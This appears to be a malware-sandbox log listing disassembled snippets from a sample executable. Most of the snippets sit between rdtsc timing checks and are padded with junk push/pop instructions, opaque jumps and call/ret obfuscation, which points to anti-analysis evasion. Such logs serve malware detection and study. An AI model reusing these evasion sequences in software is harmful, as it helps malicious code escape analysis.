Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23D0A6 second address: 23D0AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23D0AC second address: 23D0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F84B0B050DBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23E092 second address: 23E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23E096 second address: 23E0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 240312 second address: 240319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 23F4FB second address: 23F505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F84B0B050D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 240DC1 second address: 240E22 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0D655F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f pushad 0x00000010 mov edi, dword ptr [ebp+122D3839h] 0x00000016 push ebx 0x00000017 and eax, dword ptr [ebp+122D394Bh] 0x0000001d pop ecx 0x0000001e popad 0x0000001f sub dword ptr [ebp+122D393Fh], ebx 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D3858h] 0x0000002d jmp 00007F84B0D655FDh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F84B0D655F8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000014h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov esi, ecx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 240E22 second address: 240E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 240E26 second address: 240E3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 240E3E second address: 240E48 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 241852 second address: 24186B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 jnp 00007F84B0D655F6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F84B0D655FCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24186B second address: 24186F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24186F second address: 241879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F84B0D655F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 241879 second address: 2418DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F84B0B050D8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F84B0B050D8h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D27D7h], ebx 0x00000045 or dword ptr [ebp+122D2909h], esi 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+122D27D2h], esi 0x00000053 xchg eax, ebx 0x00000054 jbe 00007F84B0B050DEh 0x0000005a push edi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 242149 second address: 24214D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2457F8 second address: 2457FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24595B second address: 245973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F84B0D655FEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2478CE second address: 2478DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2478DC second address: 247950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F84B0D6560Fh 0x0000000f popad 0x00000010 nop 0x00000011 movsx edi, ax 0x00000014 push 00000000h 0x00000016 jmp 00007F84B0D65601h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F84B0D655F8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2498B1 second address: 2498BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 ja 00007F84B0B050D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2498BD second address: 2498C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 247AB9 second address: 247ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2A57 second address: 1F2A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 jg 00007F84B0D655F6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 247B7F second address: 247B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2A68 second address: 1F2A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0D65601h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 247B96 second address: 247BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2A7E second address: 1F2A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2A84 second address: 1F2AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0B050E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F84B0B050D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2AA7 second address: 1F2AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2AAF second address: 1F2AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1F2AB5 second address: 1F2AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24AF36 second address: 24AF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24AF3A second address: 24AF3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24BE58 second address: 24BE66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F84B0B050D6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B138 second address: 24B13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24BE66 second address: 24BEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F84B0B050D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f and bx, B93Ch 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F84B0B050D8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122DB75Fh], edx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F84B0B050DFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B13C second address: 24B140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24BEB4 second address: 24BEBE instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0B050DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B140 second address: 24B146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B146 second address: 24B16E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050E8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24B24A second address: 24B254 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24C054 second address: 24C05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24C05B second address: 24C0F8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F84B0D655F6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D38A5h] 0x00000015 mov bx, si 0x00000018 push dword ptr fs:[00000000h] 0x0000001f push 00000000h 0x00000021 push edx 0x00000022 call 00007F84B0D655F8h 0x00000027 pop edx 0x00000028 mov dword ptr [esp+04h], edx 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc edx 0x00000035 push edx 0x00000036 ret 0x00000037 pop edx 0x00000038 ret 0x00000039 cld 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 movzx ebx, di 0x00000044 mov eax, dword ptr [ebp+122D0DA1h] 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F84B0D655F8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2A3Eh] 0x0000006a push FFFFFFFFh 0x0000006c clc 0x0000006d nop 0x0000006e jne 00007F84B0D655FAh 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F84B0D655FFh 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC53 second address: 24DC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC57 second address: 24DC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0D65602h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC77 second address: 24DC81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 24DC81 second address: 24DCE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, 0CDFFFF4h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F84B0D655F8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D23EAh], edx 0x00000031 push 00000000h 0x00000033 jmp 00007F84B0D655FAh 0x00000038 xor edi, dword ptr [ebp+122D33ABh] 0x0000003e xchg eax, esi 0x0000003f push edi 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 pop edi 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F84B0D655F6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 251ADD second address: 251AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F84B0B050F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F84B0B050DFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 251AFC second address: 251B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252B80 second address: 252B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F84B0B050D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252B90 second address: 252BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b mov edi, 5D9211F7h 0x00000010 push 00000000h 0x00000012 sub dword ptr [ebp+122D23A3h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F84B0D655F8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 and bl, FFFFFFCDh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252BDE second address: 252BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E6h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252BFC second address: 252C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253B33 second address: 253BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F84B0B050D8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 and di, F47Bh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F84B0B050D8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 sub dword ptr [ebp+1246280Eh], edi 0x0000004a push 00000000h 0x0000004c mov edi, dword ptr [ebp+122D1C8Ah] 0x00000052 jmp 00007F84B0B050E8h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jmp 00007F84B0B050E7h 0x0000005e pushad 0x0000005f pushad 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253BC8 second address: 253BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84B0D65603h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253BE4 second address: 253BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253BEA second address: 253BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250C8A second address: 250C9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84B0B050D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250C9C second address: 250CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250CA1 second address: 250D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F84B0B050E9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 or ebx, 3BA8A5A0h 0x0000001c or dword ptr [ebp+1246A2CCh], eax 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push ebx 0x0000002a jnc 00007F84B0B050DCh 0x00000030 pop ebx 0x00000031 mov di, 1649h 0x00000035 mov eax, dword ptr [ebp+122D0269h] 0x0000003b mov edi, dword ptr [ebp+122D229Ah] 0x00000041 push FFFFFFFFh 0x00000043 mov di, ax 0x00000046 push edx 0x00000047 pop edi 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b js 00007F84B0B050E4h 0x00000051 jmp 00007F84B0B050DEh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250D28 second address: 250D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252D53 second address: 252D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 250D41 second address: 250D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252D57 second address: 252D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 252D64 second address: 252E08 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D33A1h], edx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D23F8h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F84B0D655F8h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 movsx edi, bx 0x00000043 mov edi, dword ptr [ebp+12462BFCh] 0x00000049 mov eax, dword ptr [ebp+122D0275h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F84B0D655F8h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000016h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 call 00007F84B0D65603h 0x0000006e xor dword ptr [ebp+12483D9Dh], edi 0x00000074 pop edi 0x00000075 push FFFFFFFFh 0x00000077 jns 00007F84B0D655FCh 0x0000007d add ebx, 4E59522Bh 0x00000083 push eax 0x00000084 push eax 0x00000085 push edx 0x00000086 push ecx 0x00000087 push ecx 0x00000088 pop ecx 0x00000089 pop ecx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253CFF second address: 253D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F84B0B050D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253D0A second address: 253D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D280Ch] 0x00000010 add dword ptr [ebp+12462B5Fh], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d call 00007F84B0D65605h 0x00000022 mov ebx, edx 0x00000024 pop ebx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c cmc 0x0000002d mov eax, dword ptr [ebp+122D027Dh] 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F84B0D655F8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d add edi, dword ptr [ebp+122D2C8Ah] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F84B0D655F8h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f adc bx, 3CB7h 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253D9C second address: 253DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253DB6 second address: 253DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253DBC second address: 253DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 253DC0 second address: 253DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 255A8B second address: 255A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
